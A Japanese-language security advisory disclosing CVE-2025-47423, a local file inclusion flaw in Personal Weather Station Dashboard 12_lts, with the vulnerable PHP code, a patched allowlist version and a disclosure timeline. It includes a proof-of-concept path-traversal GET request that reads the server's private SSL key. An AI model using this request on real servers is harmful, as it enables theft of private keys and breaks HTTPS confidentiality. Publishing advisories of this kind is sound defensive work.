
発見者: Matthew Eagle
ステータス: 公開開示
報告日: 2025-05-05
CVE ID: CVE-2025-47423
Personal Weather Station Dashboard バージョン 12_lts におけるローカルファイルインクルージョン(LFI)の脆弱性により、認証されていないリモート攻撃者がサーバー上の任意のファイルを読み取ることができます。この欠陥を悪用すると、プライベートSSLキーを含む機密ファイルへのアクセスが可能になり、HTTPS接続の機密性と完全性が損なわれる可能性があります。
/others/_test.phptest(GET経由)この脆弱性により、リモート攻撃者は以下が可能になります:
server.key)を露出させるCVSS: 5.8 中
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com
レスポンス:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);
str_replace はディレクトリトラバーサルを防ぐには不十分です。
basename() で入力をサニタイズし、許可されたファイルと照合する$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';
if (!in_array($script, $allowed_tests)) {
die("Invalid test file.");
}
include(__DIR__ . '/scripts/' . $script);
| 日付 | イベント |
|---|---|
| 2025-05-05 | PWS Dashboardモデレーターに脆弱性を報告 |
| 2025-05-06 | 確認とテストが実施された |
| 2025-05-07 | MITRE経由でCVE-2025-47423を予約 |
| TBD | 公開パッチとCVEリスト掲載は保留中 |
Personal Weather Station Dashboard 12_lts を実行している場合は、以下を行う必要があります:
_test.php を削除または更新する脆弱性は Matthew Eagle によって発見され、責任を持って開示されました。
連絡先: [email protected]
本開示は、責任ある開示ガイドラインに沿って調整されています。この文書は教育および防御目的で公開されています。